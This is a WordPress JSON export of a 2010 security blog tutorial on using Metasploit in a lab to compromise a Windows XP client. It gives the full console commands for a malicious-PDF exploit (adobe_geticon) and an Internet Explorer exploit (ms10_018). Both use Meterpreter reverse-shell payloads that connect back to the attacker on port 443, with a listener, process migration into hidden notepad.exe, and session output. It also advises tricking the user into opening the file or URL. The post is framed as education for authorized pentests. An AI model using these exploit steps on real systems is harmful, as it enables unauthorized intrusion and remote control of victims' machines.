{"id":24,"date":"2010-09-09T23:06:00","date_gmt":"2010-09-09T23:06:00","guid":{"rendered":"http:\/\/www.somethingsomethingsecurity.com\/?p=24"},"modified":"2010-09-09T23:06:00","modified_gmt":"2010-09-09T23:06:00","slug":"metasploit-on-the-edge-part-2-a-foothold","status":"publish","type":"post","link":"http:\/\/www.somethingsomethingsecurity.com\/?p=24","title":{"rendered":"Metasploit on the edge Part 2 \u2013 a foothold"},"content":{"rendered":"<p>The following is based on my experiences and (limited) knowledge. I am not an expert in anything, nor will I likely ever be one. My hope is that this might help someone, somewhere, sometime. If nothing else, it might be a good start for discussion.<\/p>\n<div>\u00a0<\/div>\n<p><strong>Preamble<\/strong><\/p>\n<div>\u00a0<\/div>\n<p>This exercise is for educational use only, and is intended to be used in a lab environment, or as part of an authorized pentest. Please always ensure any scans or changes to systems are part of your pentest scope and comply with your rules of engagement.<\/p>\n<div>\u00a0<\/div>\n<p>The following series of posts will walk through a fairly contrived example of how Metasploit can be used to exploit a client behind a firewall and from there be used to dig further into the network, with a final goal of remote desktop access to a Windows server. The purpose is not to go into great detail, but instead show the power of Meterpreter, its extensions and scripts.<\/p>\n<div>\u00a0<\/div>\n<p><strong>Requirements<\/strong><\/p>\n<div>\u00a0<\/div>\n<p>As mentioned previously, I will be using Backtrack 4 for the testing, and a few vulnerable machines. The first one up is an XP client with a vulnerable version of IE and Adobe Acrobat Reader. <\/p>\n<div>\u00a0<\/div>\n<p>I installed Adobe Reader 8, from oldapps.com for the prurpose of this exercise.<\/p>\n<div>\u00a0<\/div>\n<p><strong>Background<\/strong><\/p>\n<div>\u00a0<\/div>\n<p>Metasploit has several interfaces, but I like the console, so that is what will be used for this exercise. Throughout the exercise, we will get deeper and more familiar into Metasploit, but there are several excellent resources available for more information like the Metasploit.com site, the Metasploit mailing list, Offensive Security\u2019s Metasploit Unleashed (offensive-security.com), some great videos and examples from Mubix (room362.com), IronGeek (irongeek.com) and the pauldotcom crew (pauldotcom.com) and a new course from SANS (sans.org) called Metasploit Kung Fu just to name a few.<\/p>\n<div>\u00a0<\/div>\n<p>We will be setting up two different client side exploits in this part of the exercise. Both will use the meterpreter payload, which will be explained in more detail in the next instalment.<\/p>\n<div>\u00a0<\/div>\n<p><strong>Process<\/strong><\/p>\n<div>\u00a0<\/div>\n<p><em><strong>Adobe<\/strong><\/em>: <\/p>\n<div>\u00a0<\/div>\n<p>Launch msfconsole <br \/><span>\u00a0 load sounds<\/span><br \/><span>\u00a0 use exploit\/windows\/fileformat\/adobe_geticon<\/span><br \/><span>\u00a0 set FILENAME report.pdf<\/span><br \/><span>\u00a0 set OUTPUTPATH \/tmp<\/span><br \/><span>\u00a0 set payload windows\/meterpreter\/reverse_tcp<\/span><br \/><span>\u00a0 set LHOST 192.168.111.155<\/span><br \/><span>\u00a0 set LPORT 443<\/span><br \/><span>\u00a0 set InitialAutoRunScript migrate \u2013f<\/span><br \/><span>\u00a0 show options<\/span><br \/><span>\u00a0\u00a0 exploit<\/span><\/p>\n<div>\u00a0<\/div>\n<p><em>Explanation<\/em>: In Backtrack, I type msfconsle at a terminal to launch.<\/p>\n<div>\u00a0<\/div>\n<p>The first command enables sounds. This isn\u2019t necessary for anything other than my own enjoyment. May thanks to digininja for initially coming up with the idea for this functionality, and to HD for adding it to the base Metasploit framework<\/p>\n<div>\u00a0<\/div>\n<p>The rest of the commands are setting up the exploit. We are using the adobe geticon exploit to create a pdf called report.pdf which will be saved in the \/tmp folder. When the pdf is opened with a vulnerable version of adobe, it will connect back to the backtrack machine on port 443 (remember, the firewall only allows web ports).<\/p>\n<div>\u00a0<\/div>\n<p>The AutoRunScript will, on a successful exploit, launch a hidden notepad.exe process on the client, and migrate the meterpreter payload to it. This will ensure that we don\u2019t lose our meterpreter session as soon as the user closes Adobe (which they will, because to them, it would appear that adobe just froze). Look for more on this in a future post.<\/p>\n<div>\u00a0<\/div>\n<p>I try to always do a show options to verify I didn\u2019t make any typos before I start the exploit.<\/p>\n<div>\u00a0<\/div>\n<p>Before we send the file to our client, we have to setup a listener on our machine to receive the reverse meterpreter.<\/p>\n<div>\u00a0<\/div>\n<p>Still in the msfconsole<\/p>\n<div><span>\u00a0\u00a0 use exploit\/multi\/handler<\/span><\/div>\n<p><span><\/span><\/p>\n<div><span>\u00a0\u00a0 set payload windows\/meterpreter\/reverse_tcp<\/span><\/div>\n<p><span><\/span><\/p>\n<div><span>\u00a0\u00a0 set LHOST 192.168.111.155<\/span><\/div>\n<p><span><\/span><\/p>\n<div><span>\u00a0\u00a0 set LPORT 443<\/span><\/div>\n<p><span><\/span><\/p>\n<div><span>\u00a0\u00a0 exploit<\/span><\/div>\n<p><\/p>\n<div>\u00a0<\/div>\n<p><em>Explanation<\/em>: We are setting up a meterpreter listener for when the client opens our pdf. Metasploit will now dutifully wait until our client launches the pdf. When Metasploit \u201cspeaks\u201d we know our target has launched the pdf.<\/p>\n<div>\u00a0<\/div>\n<p><\/p>\n<div>\u00a0<strong><em>Internet Explorer<\/em><\/strong><\/div>\n<p><\/p>\n<div>\u00a0<\/div>\n<p>This time, we will use a vulnerability in Internet Explorer<\/p>\n<div>\u00a0 <span>use exploit\/windows\/browser\/ms10_018_ie_behaviors<\/span><\/div>\n<p><\/p>\n<div>\u00a0<\/div>\n<p>instead of showing each command, I will just display the options. Each one is set with the command<\/p>\n<div>\u00a0<\/div>\n<p>set NAME #value#<\/p>\n<div>\u00a0<\/div>\n<p>msf exploit(ms10_018_ie_behaviors) > <span>show options<\/span><\/p>\n<div>\u00a0<\/div>\n<p>Module options:<\/p>\n<div>\u00a0Name Current Setting Required Description<\/div>\n<p><\/p>\n<div>\u00a0&#8212;- &#8212;&#8212;&#8212;&#8212;&#8212; &#8212;&#8212;&#8211; &#8212;&#8212;&#8212;&#8211;<\/div>\n<p><\/p>\n<div>\u00a0SRVHOST 192.168.111.155 yes The local host to listen on.<\/div>\n<p><\/p>\n<div>\u00a0SRVPORT 80 yes The local port to listen on.<\/div>\n<p><\/p>\n<div>\u00a0SSL false no Negotiate SSL for incoming connections<\/div>\n<p><\/p>\n<div>\u00a0SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)<\/div>\n<p><\/p>\n<div>\u00a0URIPATH reports no The URI to use for this exploit (default is random)<\/div>\n<p><\/p>\n<div>\u00a0Payload options (windows\/meterpreter\/reverse_tcp):<\/div>\n<p><\/p>\n<div>\u00a0Name Current Setting Required Description<\/div>\n<p><\/p>\n<div>\u00a0&#8212;- &#8212;&#8212;&#8212;&#8212;&#8212; &#8212;&#8212;&#8211; &#8212;&#8212;&#8212;&#8211;<\/div>\n<p><\/p>\n<div>\u00a0EXITFUNC process yes Exit technique: seh, thread, process<\/div>\n<p><\/p>\n<div>\u00a0LHOST 192.168.111.155 yes The listen address<\/div>\n<p><\/p>\n<div>\u00a0LPORT 443 yes The listen port<\/div>\n<p><\/p>\n<div>\u00a0Exploit target:<\/div>\n<p><\/p>\n<div>\u00a0Id Name<\/div>\n<p><\/p>\n<div>\u00a0&#8212; &#8212;-<\/div>\n<p><\/p>\n<div>\u00a00 (Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista<\/div>\n<p><\/p>\n<div>\u00a0<\/div>\n<div><em>Explanation<\/em>:Notice that in this one, we didn\u2019t set an initial script. This exploit has that setting already defined as the default, which you can varify by doing a<span> <span>show advanced<\/span><\/span>.<\/div>\n<p>All we have to do is type in exploit in our msfconsole, and convince our user to connect to http:\/\/192.168.111.155\/reports.<\/p>\n<div>\u00a0<\/div>\n<p><\/p>\n<div>\u00a0<\/div>\n<p><\/p>\n<div>\u00a0<\/div>\n<p>msf exploit(ms10_018_ie_behaviors) ><span> exploit<\/span><\/p>\n<div>\u00a0<\/div>\n<p>[*] Exploit running as background job.<br \/>[*] Started reverse handler on 192.168.111.155:443<\/p>\n<div>\u00a0[*] Using URL: http:\/\/192.168.111.155:80\/reports<\/div>\n<p><\/p>\n<div>\u00a0[*] Server started.<\/div>\n<p><\/p>\n<div>\u00a0msf exploit(ms10_018_ie_behaviors) ><\/div>\n<p><\/p>\n<div>\u00a0[*] Sending Internet Explorer DHTML Behaviors Use After Free to 192.168.111.156:64144 (target: IE 6 SP0-SP2 (onclick))&#8230;<\/div>\n<p><\/p>\n<div>\u00a0[*] Sending stage (748032 bytes) to 192.168.111.156<\/div>\n<p><\/p>\n<div>\u00a0[*] Meterpreter session 1 opened (192.168.111.155:443 -> 192.168.111.156:54337) at 2010-07-13 22:24:09 -0400<\/div>\n<p><\/p>\n<div>\u00a0[*] Session ID 1 (192.168.111.155:443 -> 192.168.111.156:54337) processing InitialAutoRunScript &#8216;migrate -f&#8217;<\/div>\n<p><\/p>\n<div>\u00a0[*] Current server process: iexplore.exe (352)<\/div>\n<p><\/p>\n<div>\u00a0[*] Spawning a notepad.exe host process&#8230;<\/div>\n<p><\/p>\n<div>\u00a0[*] Migrating into process ID 1416<\/div>\n<p><\/p>\n<div>\u00a0[*] New server process: notepad.exe (1416)<\/div>\n<p><\/p>\n<div>\u00a0<\/div>\n<p>msf exploit(ms10_018_ie_behaviors) > <span>sessions -i 1<\/span><\/p>\n<div>[*] Starting interaction with 1&#8230;<\/div>\n<p><\/p>\n<div>meterpreter ><span> ipconfig<\/span><\/div>\n<p><\/p>\n<div>AMD PCNET Family PCI Ethernet Adapter &#8211; Packet Scheduler Miniport<\/div>\n<p><\/p>\n<div>Hardware MAC: 00:0c:29:3e:23:8a<\/div>\n<p><\/p>\n<div>\u00a0IP Address : 10.13.37.149<\/div>\n<p><\/p>\n<div>\u00a0Netmask : 255.255.255.0<\/div>\n<div>\u00a0<\/div>\n<div><em>Explanation<\/em>: After the meterpreter has connectect back to our listener, to interact with it you type sessions -i # where @ is the Metasploit session number of that particular session, in our case 1. Then I type ipconfig to show the ip of the clients machine.<\/div>\n<p><\/p>\n<div>\u00a0<\/div>\n<p><strong>Next Steps<\/strong><\/p>\n<div>\u00a0<\/div>\n<p>Exploring the client\u2019s network.<\/p>\n<div>\u00a0<\/div>\n","protected":false},"excerpt":{"rendered":"<p>The following is based on my experiences and (limited) knowledge. I am not an expert in anything, nor will I likely ever be one. My hope is that this might help someone, somewhere, sometime. If nothing else, it might be a good start for discussion. \u00a0 Preamble \u00a0 This exercise is for educational use only, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,3],"tags":[],"class_list":["post-24","post","type-post","status-publish","format-standard","hentry","category-metasploit","category-red"],"_links":{"self":[{"href":"http:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=\/wp\/v2\/posts\/24","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24"}],"version-history":[{"count":0,"href":"http:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=\/wp\/v2\/posts\/24\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.somethingsomethingsecurity.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}